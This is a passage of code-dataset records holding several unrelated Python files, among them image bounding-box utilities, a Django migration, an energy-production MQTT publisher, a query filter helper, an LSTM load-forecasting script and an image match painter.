self.colors[names[i]] = (random.randint(0, 125), random.randint(0, 125), random.randint(0, 125))\n\n def get_color(self, name):\n if name in self.colors:\n return self.colors[name]\n else:\n return self.default_color\n\n\nclass IMGLIB:\n def __init__(self, color_conf=None):\n if color_conf is None:\n default_color = (255, 0, 0)\n self.color_conf = COLOR_CONF(default_color=default_color)\n else:\n self.color_conf = color_conf\n\n FontData = os.path.join(os.path.dirname(os.path.realpath(__file__)), \"OpenSans-Regular.ttf\")\n self.font = ImageFont.truetype(FontData, self.color_conf.default_font_size)\n\n def setBBXs(self, bboxs=None, names=None):\n self.bbxs = []\n for i, bbox in enumerate(bboxs):\n\n bbx = BBX()\n\n if names == None:\n bbx.name = None\n else:\n bbx.name = names[i]\n bbx.x = safeInt(bbox[0])\n bbx.y = safeInt(bbox[1])\n bbx.w = safeInt(bbox[2])\n bbx.h = safeInt(bbox[3])\n bbx.score = bbox[4]\n self.bbxs.append(bbx)\n\n def setTrueBBXs(self, bboxs=None, names=None):\n self.bbxs_true = []\n for i, bbox in enumerate(bboxs):\n\n bbx = BBX()\n\n if names is None:\n bbx.name = None\n else:\n bbx.name = names[i]\n bbx.x = safeInt(bbox[0])\n bbx.y = safeInt(bbox[1])\n bbx.w = safeInt(bbox[2])\n bbx.h = safeInt(bbox[3])\n bbx.score = 1.\n self.bbxs_true.append(bbx)\n\n def showBBXs(self):\n self.drawBox()\n self.img.show()\n\n def saveBBXs(self, fileName):\n f = open(fileName, 'w')\n for bbx in self.bbxs:\n f.write('%s %d %d %d %d %f\\n' % (bbx.name, bbx.x, bbx.y, bbx.w, bbx.h, bbx.score))\n f.close()\n\n def drawOneBox(self, bbx, thr=-1.0, showName=False):\n if bbx.score >= thr:\n\n x = bbx.x\n y = bbx.y\n w = bbx.w\n h = bbx.h\n # print x,y,w,h\n line1 = ((x, y), (x + w, y), (x + w, y + h), (x, y + h), (x, y))\n\n fill_color = self.color_conf.get_color(bbx.name)\n # print line1\n # print(fill_color)\n # print self.color_conf.line_width\n self.draw.line(line1, fill=fill_color, width=self.color_conf.line_width)\n\n if bbx.name == None or showName == False:\n self.draw.text((x + self.color_conf.line_width, y), str(bbx.score), fill=fill_color, font=self.font)\n else:\n self.draw.text((x + self.color_conf.line_width, y), bbx.name + ' ' + str(bbx.score), fill=fill_color,\n font=self.font)\n\n def drawOneBoxTrue(self, bbx, showName=False):\n x = bbx.x\n y = bbx.y\n w = bbx.w\n h = bbx.h\n line1 = ((x, y), (x + w, y), (x + w, y + h), (x, y + h), (x, y))\n fill_color = self.color_conf.get_color(bbx.name)\n self.draw.line(line1, fill=fill_color, width=self.color_conf.line_width)\n\n if bbx.name == None or showName == False:\n self.draw.text((x + self.color_conf.line_width, y), 'True', fill=fill_color, font=self.font)\n else:\n\n self.draw.text((x + self.color_conf.line_width, y), bbx.name + '_True', fill=fill_color, font=self.font)\n\n def drawBox(self, thr=-1.0, showName=True, show_true=True, strict=False):\n self.draw = ImageDraw.Draw(self.img)\n\n if hasattr(self, 'bbxs'):\n for bbx in self.bbxs:\n if strict and bbx.name not in self.color_conf.names:\n continue\n self.drawOneBox(bbx, thr, showName)\n\n if show_true and hasattr(self, 'bbxs_true'):\n for bbx in self.bbxs_true:\n if strict and bbx.name not in self.color_conf.names:\n continue\n self.drawOneBoxTrue(bbx, showName)\n\n def read_img(self, fileName):\n self.img = Image.open(fileName).convert('RGB')\n\n def read_gray_img(self, fileName):\n self.img = Image.open(fileName).convert('L')\n\n def read_ano(self, fileName):\n\n f = open(fileName, 'r')\n lines = f.readlines()\n self.bbxs = []\n for line in lines[:]:\n nbbx = BBX()\n nbbx.str2bbx(line)\n self.bbxs.append(nbbx)\n\n def read_ano_true(self, fileName):\n\n f = open(fileName, 'r')\n lines = f.readlines()\n self.bbxs_true = []\n for line in lines[:]:\n nbbx = BBX()\n nbbx.str2bbx_true(line)\n self.bbxs_true.append(nbbx)\n\n def resizeBBXs(self, r, x_d, y_d):\n for bbx in self.bbxs:\n bbx.resize(r, x_d, y_d)\n\n def resize(self, width, height, scale=1.0):\n o_width, o_height = self.img.size\n t_width = safeInt(width * scale)\n t_height = safeInt(height * scale)\n\n o_ratio = o_width / float(o_height)\n n_ratio = width / float(height)\n\n if o_ratio > n_ratio:\n re_ration = t_width / float(o_width)\n a_height = safeInt(re_ration * o_height)\n a_width = t_width\n self.img = self.img.resize((a_width, a_height), Image.ANTIALIAS)\n else:\n re_ration = t_height / float(o_height)\n a_width = safeInt(re_ration * o_width)\n a_height = t_height\n self.img = self.img.resize((a_width, a_height), Image.ANTIALIAS)\n\n self.x_d = random.randint(0, abs(a_width - width))\n self.y_d = random.randint(0, abs(a_height - height))\n imgNew = Image.new(\"RGB\", (width, height), \"black\")\n\n box = (0, 0, a_width, a_height)\n region = self.img.crop(box)\n\n imgNew.paste(region, (self.x_d, self.y_d))\n self.img = imgNew\n if hasattr(self, 'bbxs'):\n self.resizeBBXs(re_ration, self.x_d, self.y_d)\n # self.drawBox()\n\n def cleanAno(self, w0, h0):\n newBBXS = []\n for bbox in self.bbxs:\n if bbox.x >= 0 and bbox.x <= w0 and bbox.y >= 0 and bbox.y <= h0 and bbox.w >= 20 and bbox.w <= w0 and bbox.h >= 30 and bbox.h <= h0:\n bbx = BBX()\n bbx.name = bbox.name\n bbx.x = bbox.x\n bbx.y = bbox.y\n bbx.w = bbox.w\n bbx.h = bbox.h\n bbx.score = bbox.score\n newBBXS.append(bbx)\n self.bbxs = newBBXS\n\n def save_img(self, imgName):\n self.img.save(imgName)\n\n def pureResize(self, width, height):\n re_ration = float(width) / self.img.size[0]\n self.img = self.img.resize((width, height), Image.ANTIALIAS)\n if hasattr(self, 'bbxs'):\n self.resizeBBXs(re_ration, 0, 0)\n\n def pureResizeBBX(self, original_width, width, height):\n re_ration = float(width) / original_width\n if hasattr(self, 'bbxs'):\n self.resizeBBXs(re_ration, 0, 0)\n\n def flip(self, width):\n self.img = self.img.transpose(Image.FLIP_LEFT_RIGHT)\n newBBXS = []\n for bbox in self.bbxs:\n bbox.x = width - bbox.x - bbox.w\n newBBXS.append(bbox)\n self.bbxs = newBBXS\n\n def normalization(self, mean_pix): # 除以均值\n im = np.asarray(self.img, dtype=np.float)\n x_min, x_max, y_min, y_max = get_region(im)\n tmp = im[im > 20]\n if len(tmp) == 0:\n return\n im *= mean_pix / np.mean(tmp)\n # delta = np.mean(im[x_min:x_max, y_min:y_max]) - mean_pix\n # im[x_min:x_max, y_min:y_max] -= delta\n im[im < 0] = 0\n im[im > 255] = 255\n self.img = Image.fromarray(np.uint8(im))\n\n # def normalization(self, mean_pix, var_pix): #减均值\n # im = np.asarray(self.img, dtype=np.float)\n # x_min, x_max, y_min, y_max = get_region(im)\n # tmp = im[im > 20]\n # if len(tmp) == 0:\n # return\n # im = im - np.mean(tmp) + mean_pix\n # im[im < 0] = 0\n # im[im > 255] = 255\n # self.img = Image.fromarray(np.uint8(im))\n\n # def normalization(self, mean_pix, var_pix): #减均值,除方差\n # im = np.asarray(self.img, dtype=np.float)\n # x_min, x_max, y_min, y_max = get_region(im)\n # tmp = im[im > 20]\n # if len(tmp) == 0:\n # return\n # im = im - np.mean(tmp) + mean_pix\n # im = im * var_pix / np.var(tmp)\n # im[im < 0] = 0\n # im[im > 255] = 255\n # self.img = Image.fromarray(np.uint8(im))\n\n\n# mat1 --> ground truth(s); mat2 --> anchors\ndef compute_overlap(mat1, mat2):\n s1 = mat1.shape[0]\n s2 = mat2.shape[0]\n area1 = (mat1[:, 2] - mat1[:, 0]) * (mat1[:, 3] - mat1[:, 1])\n if mat2.shape[1] == 5:\n area2 = mat2[:, 4]\n else:\n area2 = (mat2[:, 2] - mat2[:, 0]) * (mat2[:, 3] - mat2[:, 1])\n x1 = cartesian([mat1[:, 0], mat2[:, 0]])\n x1 = np.amax(x1, axis=1)\n x2 = cartesian([mat1[:, 2], mat2[:, 2]])\n x2 = np.amin(x2, axis=1)\n com_zero = np.zeros(x2.shape[0])\n w = x2 - x1\n w = w - 1\n w = np.maximum(com_zero, w)\n y1 = cartesian([mat1[:, 1], mat2[:, 1]])\n y1 = np.amax(y1, axis=1)\n y2 = cartesian([mat1[:, 3], mat2[:, 3]])\n y2 = np.amin(y2, axis=1)\n h = y2 - y1\n h = h - 1\n h = np.maximum(com_zero, h)\n oo = w * h\n aa = cartesian([area1[:], area2[:]])\n aa = np.sum(aa, axis=1)\n ooo = oo / (aa - oo)\n overlap = np.transpose(ooo.reshape(s1, s2), (1, 0))\n return overlap\n\n\n# mat1 --> ground truth; mat2 --> anchor\ndef compute_regression(mat1, mat2):\n target = np.zeros(4)\n w1 = mat1[2] - mat1[0]\n h1 = mat1[3] - mat1[1]\n w2 = mat2[2] - mat2[0]\n h2 = mat2[3] - mat2[1]\n target[0] = (mat1[0] - mat2[0]) / w2\n target[1] = (mat1[1] - mat2[1]) / h2\n target[2] = np.log(w1 / w2)\n target[3] = np.log(h1 / h2)\n return target\n\n\ndef compute_target(roi_t, proposals, fg_thresh, bg_thresh):\n roi = roi_t.copy()\n roi[:, 2] += roi[:, 0]\n roi[:, 3] += roi[:, 1]\n proposal_size = proposals.shape[0]\n roi_anchor = np.zeros([proposal_size, 5])\n # roi_anchor[:, 0] = 0 #change here to set all bbx to background\n if roi.shape[0] == 0:\n # roi_anchor[:, 0] = 0\n return roi_anchor, 0\n overlap = compute_overlap(roi, proposals)\n overlap_max = np.max(overlap, axis=1)\n overlap_max_idx = np.argmax(overlap, axis=1)\n for i in range(proposal_size):\n if overlap_max[i] >= fg_thresh:\n roi_anchor[i, 0] = 1\n roi_anchor[i, 1:5] = compute_regression(roi[overlap_max_idx[i], :4], proposals[i, :])\n if overlap_max[i] <= bg_thresh:\n roi_anchor[i, 0] = 0\n foreground = np.sum(roi_anchor[:, 0] > 1)\n return roi_anchor, foreground\n\n\ndef compute_target_v2(roi_t, proposals, fg_thresh):\n roi = roi_t.copy()\n roi[:, 2] += roi[:, 0]\n roi[:, 3] += roi[:, 1]\n proposal_size = proposals.shape[0]\n roi_anchor = np.zeros([proposal_size, 5])\n # roi_anchor[:, 0] = 0 #change here to set all bbx to background\n if roi.shape[0] == 0:\n # roi_anchor[:, 0] = 0\n return roi_anchor, 0\n overlap = compute_overlap(roi, proposals)\n overlap_max = np.max(overlap, axis=1)\n overlap_max_idx = np.argmax(overlap, axis=1)\n for i in range(proposal_size):\n if overlap_max[i] >= fg_thresh:\n roi_anchor[i, 0] = 1\n roi_anchor[i, 1:5] = compute_regression(roi[overlap_max_idx[i], :4], proposals[i, :])\n # else:\n # roi_anchor[i, 0] = 0\n foreground = np.sum(roi_anchor[:, 0] > 1)\n return roi_anchor, foreground\n","sub_path":"TARTDetection/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":17107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"225529389","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('profiles', '0012_auto_20150905_1915'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ResearcherInvitation',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('message', models.TextField(max_length=1000, blank=True)),\n ('key', models.CharField(max_length=8)),\n ('activated', models.BooleanField(default=False)),\n ('invitee', models.ForeignKey(to='profiles.Researcher')),\n ('inviter', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"invite/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"231776544","text":"import requests\r\nimport json\r\nfrom datetime import datetime, timedelta\r\nfrom dateutil.relativedelta import *\r\n\r\nfrom importlib import import_module\r\nmain = import_module(\"main\")\r\nf = import_module(\"function\")\r\n\r\ndef dailyProduction(cur, client, last_activation_date):\r\n my_date = datetime.now()\r\n pdl = main.pdl\r\n production_base = main.production_base\r\n\r\n ha_discovery = {\r\n pdl: {}\r\n }\r\n\r\n # Check activation data\r\n last_activation_date = last_activation_date.split(\"+\")[0]\r\n last_activation_date = datetime.strptime(last_activation_date, '%Y-%m-%d')\r\n\r\n lastYears = datetime.now() + relativedelta(years=-1)\r\n dateBegin = lastYears.strftime('%Y-%m-%d')\r\n dateEnded = my_date.strftime('%Y-%m-%d')\r\n\r\n data = dailyProductionBeetwen(cur, pdl, dateBegin, dateEnded, last_activation_date)\r\n for key, value in data.items():\r\n f.publish(client, f\"{pdl}/production/current_year/{key}\", str(value))\r\n if key != \"dateBegin\" and key != \"dateEnded\":\r\n ha_discovery[pdl].update({\r\n f\"production_{key.replace('-','_')}\": {\r\n \"value\": str(value),\r\n \"unit_of_meas\": \"W\",\r\n \"device_class\": \"energy\",\r\n \"state_class\": \"total_increasing\",\r\n \"attributes\": {}\r\n }\r\n })\r\n if production_base != 0:\r\n if isinstance(value, int):\r\n roundValue = round(int(value) / 1000 * production_base, 2)\r\n f.publish(client, f\"{pdl}/production_price/current_year/{key}\", roundValue)\r\n if key != \"dateBegin\" and key != \"dateEnded\":\r\n if not f\"price\" in ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'].keys():\r\n ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'][f\"price\"] = str(roundValue)\r\n lastData = data\r\n\r\n current_year = 1\r\n while current_year <= main.years:\r\n if main.years >= current_year:\r\n f.log(f\"Year => {current_year}\")\r\n dateEnded = dateBegin\r\n dateEndedDelta = datetime.strptime(dateEnded, '%Y-%m-%d')\r\n # dateEnded = dateEndedDelta + relativedelta(days=-1)\r\n # dateEnded = dateEnded.strftime('%Y-%m-%d')\r\n dateBegin = dateEndedDelta + relativedelta(years=-1)\r\n dateBegin = dateBegin.strftime('%Y-%m-%d')\r\n data = dailyProductionBeetwen(cur, pdl, dateBegin, dateEnded, last_activation_date)\r\n if \"error_code\" in data:\r\n f.publish(client, f\"{pdl}/production/year-{current_year}/error\", str(1))\r\n for key, value in data.items():\r\n f.publish(client, f\"{pdl}/production/year-{current_year}/errorMsg/{key}\", str(value))\r\n else:\r\n f.publish(client, f\"{pdl}/production/year-{current_year}/error\", str(0))\r\n for key, value in data.items():\r\n f.publish(client, f\"{pdl}/production/year-{current_year}/{key}\", str(value))\r\n if key != \"dateBegin\" and key != \"dateEnded\":\r\n if f\"production_{key.replace('-', '_')}\" in ha_discovery[pdl]:\r\n # CALC VARIATION\r\n if key in lastData:\r\n variation = (lastData[key] - value) / value * 100\r\n if not f\"variation_year_{current_year}\" in ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'].keys():\r\n ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'][f\"variation_year_{current_year}\"] = str(round(variation, 2))\r\n # SET HISTORY ATTRIBUTES\r\n if not f\"history_year_{current_year}\" in ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'].keys():\r\n ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'][f\"history_year_{current_year}\"] = str(value)\r\n if production_base != 0:\r\n if isinstance(value, int):\r\n roundValue = round(int(value) / 1000 * production_base, 2)\r\n f.publish(client, f\"{pdl}/production_price/year-{current_year}/{key}\", roundValue)\r\n # if f\"price_production_{key.replace('-', '_')}\" in ha_discovery[pdl]:\r\n if not f\"price_year_{current_year}\" in ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'].keys():\r\n ha_discovery[pdl][f\"production_{key.replace('-', '_')}\"]['attributes'][f\"price_year_{current_year}\"] = str(roundValue)\r\n current_year = current_year + 1\r\n return ha_discovery\r\n\r\ndef checkHistoryProductionDaily(cur, dateBegin, dateEnded):\r\n pdl = main.pdl\r\n dateBegin = datetime.strptime(dateBegin, '%Y-%m-%d')\r\n dateEnded = datetime.strptime(dateEnded, '%Y-%m-%d')\r\n delta = dateEnded - dateBegin\r\n result = {\r\n \"status\": True,\r\n \"date\": [],\r\n \"count\": 0\r\n }\r\n for i in range(delta.days + 1):\r\n checkDate = dateBegin + timedelta(days=i)\r\n checkDate = checkDate.strftime('%Y-%m-%d')\r\n query = f\"SELECT * FROM production_daily WHERE pdl = '{main.pdl}' AND date = '{checkDate}'\"\r\n cur.execute(query)\r\n if cur.fetchone() is None:\r\n main.api_no_result.append(checkDate)\r\n result[\"date\"].append(checkDate)\r\n result[\"status\"] = False\r\n result[\"count\"] = result[\"count\"] + 1\r\n return result\r\n\r\ndef dailyProductionBeetwen(cur, pdl, dateBegin, dateEnded, last_activation_date):\r\n response = {}\r\n\r\n lastYears = datetime.strptime(dateEnded, '%Y-%m-%d')\r\n lastYears = lastYears + relativedelta(years=-1)\r\n if lastYears < last_activation_date:\r\n dateBegin = last_activation_date\r\n dateBegin = dateBegin.strftime('%Y-%m-%d')\r\n\r\n response['dateBegin'] = dateBegin\r\n response['dateEnded'] = dateEnded\r\n\r\n data = {\r\n \"type\": \"daily_production\",\r\n \"usage_point_id\": str(pdl),\r\n \"start\": str(dateBegin),\r\n \"end\": str(dateEnded),\r\n }\r\n\r\n try:\r\n new_date = []\r\n current_data = checkHistoryProductionDaily(cur, dateBegin, dateEnded)\r\n if current_data['status'] == True:\r\n f.log(f\"All data loading beetween {dateBegin} / {dateEnded}\")\r\n f.log(f\" => Skip API Call\")\r\n else:\r\n f.log(f\"Data is missing between {dateBegin} / {dateEnded}\")\r\n\r\n daily_production = requests.request(\"POST\", url=f\"{main.url}\", headers=main.headers, data=json.dumps(data)).json()\r\n meter_reading = daily_production['meter_reading']\r\n mesures = {}\r\n f.log(\"Import data :\")\r\n log_import = []\r\n for interval_reading in meter_reading[\"interval_reading\"]:\r\n date = interval_reading['date']\r\n value = interval_reading['value']\r\n cur.execute(f\"INSERT OR REPLACE INTO production_daily VALUES ('{pdl}','{interval_reading['date']}','{interval_reading['value']}')\")\r\n new_date.append(interval_reading['date'])\r\n mesures[date] = value\r\n list_date = list(reversed(sorted(mesures.keys())))\r\n\r\n f.splitLog(new_date)\r\n\r\n not_found_data = []\r\n for current_date in current_data['date']:\r\n if not current_date in new_date:\r\n not_found_data.append(current_date)\r\n\r\n if not_found_data != []:\r\n f.log(\"Data not found :\")\r\n f.splitLog(not_found_data)\r\n\r\n dateEnded = datetime.strptime(dateEnded, '%Y-%m-%d')\r\n\r\n dateWeek = dateEnded + relativedelta(days=-7)\r\n dateMonths = dateEnded + relativedelta(months=-1)\r\n dateYears = dateEnded + relativedelta(years=-1)\r\n j1 = dateEnded + relativedelta(days=-1)\r\n j1 = j1.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j2 = dateEnded + relativedelta(days=-2)\r\n j2 = j2.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j3 = dateEnded + relativedelta(days=-3)\r\n j3 = j3.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j4 = dateEnded + relativedelta(days=-4)\r\n j4 = j4.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j5 = dateEnded + relativedelta(days=-5)\r\n j5 = j5.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j6 = dateEnded + relativedelta(days=-6)\r\n j6 = j6.replace(hour=0, minute=0, second=0, microsecond=0)\r\n j7 = dateEnded + relativedelta(days=-7)\r\n j7 = j7.replace(hour=0, minute=0, second=0)\r\n\r\n energyWeek = 0\r\n energyMonths = 0\r\n energyYears = 0\r\n\r\n for date in list_date:\r\n value = int(mesures[date])\r\n current_date = datetime.strptime(date, '%Y-%m-%d')\r\n\r\n # WEEK DAYS\r\n if current_date == j1:\r\n response['j-1'] = value\r\n if current_date == j2:\r\n response['j-2'] = value\r\n if current_date == j3:\r\n response['j-3'] = value\r\n if current_date == j4:\r\n response['j-4'] = value\r\n if current_date == j5:\r\n response['j-5'] = value\r\n if current_date == j6:\r\n response['j-6'] = value\r\n if current_date == j7:\r\n response['j-7'] = value\r\n # LAST WEEK\r\n if current_date >= dateWeek:\r\n energyWeek = int(energyWeek) + int(value)\r\n # LAST MONTH\r\n if current_date >= dateMonths:\r\n energyMonths = int(energyMonths) + int(value)\r\n # LAST YEARS\r\n if current_date >= dateYears:\r\n energyYears = int(energyYears) + int(value)\r\n\r\n response['thisWeek'] = energyWeek\r\n response['thisMonth'] = energyMonths\r\n response['thisYear'] = energyYears\r\n except:\r\n for error_key, error_msg in daily_production.items():\r\n response[error_key] = error_msg\r\n\r\n return response","sub_path":"app/daily_production.py","file_name":"daily_production.py","file_ext":"py","file_size_in_byte":10456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"170461253","text":"# -*- coding: utf-8 -*-\n\"\"\"This module contains the generic filter for all project\n\"\"\"\n\n__author__ = \"Yoanny Torres Rubio\"\n__copyright__ = \"Copyright 2013-2014, GRHS\"\n__version__ = \"0.1\"\n__email__ = \"tlm@uci.cu\"\n\nfrom django.db.models.fields import DateTimeField\nfrom configuration.server.location.models import AgentInfo, Location\nfrom core.agent.models import Agent\nfrom core.collector.models import InformationAgent\nfrom inventory.stocktaking.models import Inventory\nfrom maai.actions.models import ActionClient\nfrom maai.alerts.models import MessageAlert\nfrom maai.controls.models import ControlClient\nfrom maai.incidence.models import Incidence\nimport datetime\nimport time\n\n\ndef generic_filter(queryset, self, model_class=None):\n model_class = model_class or queryset.model\n for field in model_class._meta.local_fields:\n param = self.request.QUERY_PARAMS.get(field.name, None)\n\n di = {}\n if param is not None:\n if type(field) is DateTimeField:\n try:\n time.strptime(param, '%Y-%m-%d')\n date_time = datetime.datetime.strptime(\n param,\n '%Y-%m-%d'\n ).date()\n di[field.name + '__year'] = date_time.year\n di[field.name + '__month'] = date_time.month\n di[field.name + '__day'] = date_time.day\n except:\n asd = 5\n #raise Exception.\n\n if field.name not in ('component', 'type', 'state', 'level',\n 'plataform', 'menu', 'permission'):\n if str(param) == 'True':\n di[field.name] = True\n elif str(param) == 'False':\n di[field.name] = False\n elif type(field) is not DateTimeField:\n di[field.name + \"__contains\"] = str(param)\n elif model_class is MessageAlert:\n if type(field) is not DateTimeField:\n di[field.name + \"__contains\"] = str(param)\n else:\n if type(field) is not DateTimeField:\n di[field.name + \"__name__contains\"] = str(param)\n\n queryset = queryset.filter(**di)\n\n queryset = get_by_host(self, queryset, '__contains', model_class, 'host')\n\n queryset = get_by_host(self, queryset, '', model_class, 'mb_strict')\n\n location = self.request.QUERY_PARAMS.get('location', None)\n\n if location is not None:\n location_lookup = 'inventory__agent__host__in'\n if model_class in (InformationAgent, Incidence, ActionClient,\n ControlClient, Inventory):\n location_lookup = ('agent__info__network__locations__place__name__'\n 'contains')\n elif model_class is Agent:\n location_lookup = 'info__network__locations__place__name__contains'\n else:\n location_lookup = ('inventory__agent__info__network__locations__'\n 'place__name__contains')\n\n queryset = queryset.filter(**{location_lookup: location})\n\n sort = self.request.QUERY_PARAMS.get('sort', None)\n\n order = self.request.QUERY_PARAMS.get('order', None)\n\n if sort is not None:\n sort = str(sort)\n if order is not None:\n if order == 'desc':\n value_field = '-' + sort\n queryset = queryset.order_by(value_field)\n else:\n queryset = queryset.order_by(sort)\n else:\n queryset = queryset.order_by()\n\n return queryset\n\n\ndef get_by_host(self, queryset, query, model_class, param):\n host = self.request.QUERY_PARAMS.get(param, None)\n\n if host is not None:\n fill = {}\n if model_class in (InformationAgent, Incidence, ActionClient,\n ControlClient, Inventory):\n fill['agent__host' + query] = host\n elif model_class is Agent:\n fill['host' + query] = host\n else:\n fill['inventory__agent__host' + query] = host\n fill['status'] = True\n\n queryset = queryset.filter(**fill)\n\n return queryset\n","sub_path":"xilema/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"106018640","text":"from ..tyrell.dsl import Node, HoleNode\nfrom ..tyrell.spec import FunctionProduction\n\nclass InvariantHeuristic():\n '''\n Provides a set of invariant heuristic checkings.\n Returns True if the given heuristic is good to go, False if not.\n '''\n\n def __init__():\n pass\n\n # @classmethod\n # def no_duplicate_children(self, arg_prods, arg_inv):\n # '''\n # Check if *all* children of nodes of designated production rules are exactly the same.\n # '''\n # assert len(arg_prods)>0, \"Should provide at least one production rule for checking.\"\n # if isinstance(arg_inv, HoleNode):\n # # if root node is a hole, just return False\n # return True\n # elif arg_inv.production in arg_prods:\n # sig_list = [str(p) for p in arg_inv.children]\n # sig_set = set(sig_list)\n # return len(sig_set) > 1\n # else:\n # # move on to next level\n # res_list = [InvariantHeuristic.no_duplicate_children(p) for p in arg_inv.children]\n # return all(res_list)\n\n @classmethod\n def no_duplicate_children(self, arg_inv):\n '''\n Check if *all* children of nodes look the same.\n Apply to complete invariant.\n '''\n if isinstance(arg_inv, HoleNode):\n # if root node is a hole, just return False\n return True\n elif len(arg_inv.children) > 1:\n sig_list = [str(p) for p in arg_inv.children]\n sig_set = set(sig_list)\n return len(sig_set) > 1\n else:\n # move on to next level\n res_list = [InvariantHeuristic.no_duplicate_children(p) for p in arg_inv.children]\n return all(res_list)\n\n @classmethod\n def no_enum2expr_root(self, arg_inv):\n '''\n Check if the root node is enum2expr.\n Apply to complete and partial invariants.\n '''\n if isinstance(arg_inv, HoleNode):\n return True\n elif isinstance(arg_inv.production, FunctionProduction):\n if arg_inv.production.name == \"enum2expr\":\n return False\n else:\n return True\n else:\n return True\n","sub_path":"solinv/environment/invariant_heuristic.py","file_name":"invariant_heuristic.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"521647076","text":"import pandas as pd \r\nimport numpy as np \r\nimport matplotlib.pyplot as plt \r\nfrom sklearn.preprocessing import MinMaxScaler \r\nfrom tensorflow.keras.layers import Dense,Dropout,LSTM \r\nfrom tensorflow.keras.models import Sequential \r\nfrom tensorflow.keras.optimizers import Adam \r\nfrom tensorflow.keras.activations import relu,linear \r\nscale = MinMaxScaler(feature_range = (0,1))\r\n\r\ndf = pd.read_csv(\"a_zone.csv\")\r\ndf = df.drop(df[[\"Unnamed: 0\"]],axis = 1)\r\ndf = df.fillna(method = 'ffill')\r\n\r\ntraining_set = df[:-12]\r\n\r\ntest_set = df[-12:]\r\n\r\ntraining_set_scaled = scale.fit_transform(training_set)\r\ntest_set_scaled = scale.fit_transform(test_set)\r\n\r\nX_train = [] \r\ny_train = [] \r\n\r\ntotal_data_scaled = scale.fit_transform(df)\r\n\r\nfor x in range(12,len(total_data_scaled)): \r\n X_train.append(total_data_scaled[x-12:x])\r\n y_train.append(total_data_scaled[x])\r\n \r\nX_train = np.array(X_train)\r\ny_train = np.array(y_train)\r\n\r\n\r\n\r\nkva = Sequential() \r\n\r\nkva.add(LSTM(units = 150,input_shape = (X_train.shape[1],1) ,activation = relu,return_sequences = True \r\n ))\r\n\r\nkva.add(Dropout(0.5))\r\n\r\nkva.add(LSTM(units = 50,activation = relu,return_sequences = True \r\n ))\r\n\r\nkva.add(Dropout(0.5))\r\n\r\nkva.add(LSTM(units = 50,activation = relu,\r\n return_sequences = False\r\n ))\r\n\r\nkva.add(Dropout(0.5))\r\nkva.add(Dense(units = 1,activation = linear))\r\n\r\nkva.compile(optimizer = \"adam\",loss = \"mean_squared_error\")\r\n\r\nkva.fit(X_train,y_train,epochs = 100,batch_size = 12)\r\n\r\nbatch = training_set_scaled[-12:].reshape(1,12,1)\r\n\r\ntime = 48\r\n\r\npred_kva = []\r\n\r\n\r\nfor x in range(0,time):\r\n kv = kva.predict(batch)\r\n pred_kva.append(scale.inverse_transform(kv))\r\n batch = np.append(batch[:,1:,:],kv.reshape(1,1,1))\r\n batch = batch.reshape(1,12,1)\r\n \r\n\r\n\r\n\r\n\r\ndf_date = pd.date_range('2013/9/1',periods = 76,freq = \"M\")\r\n\r\ndf_date_pred = pd.date_range('2019/1/1',periods = time,freq = \"M\")\r\n\r\ndf_p = pd.DataFrame()\r\n\r\n\r\n \r\nfor x in range(0,len(pred_kva)):\r\n slime = pd.DataFrame(pred_kva[x],columns = [\"predicted_units\"])\r\n df_p = pd.concat([df_p,slime],axis = 0)\r\n\r\n\r\nplt.plot(df_date,df,color = 'blue')\r\n\r\nplt.plot(df_date_pred,df_p,color = 'black')\r\n\r\nplt.title(\"predicted_a_zone\")\r\n\r\nplt.show()\r\n\r\n\r\n\r\n","sub_path":"Electrical Load Forecasting/a_zone.py","file_name":"a_zone.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"2043943","text":"from __future__ import division\n\nimport cv2\n\nfrom CrystalMatch.dls_util.shape import Point\nfrom CrystalMatch.dls_util.imaging import Image, Color\n\n\nclass MatchPainter:\n \"\"\" Creates images illustrating the results of the feature match process. The resulting image shows the two\n images side-by-side with lines drawn between them indicating the matches.\n\n In addition, the image can contain the location of a point in image1 with its corresponding transform in\n image 2 as well as a rectangle from image 1 with its corresponding transformed shape in image 2.\n \"\"\"\n DEFAULT_IMAGE_SIZE = 900\n DEFAULT_PADDING = 5\n DEFAULT_BACK_COLOR = Color.black()\n\n IMAGE_1 = 1\n IMAGE_2 = 2\n\n def __init__(self, image1, image2):\n self._image1 = image1\n self._image2 = image2\n\n self._image1_position = Point(0, 0)\n self._image2_position = Point(0, 0)\n self._scale_factor = 1\n self._background_image = None\n\n self._image_size = self.DEFAULT_IMAGE_SIZE\n self._padding = 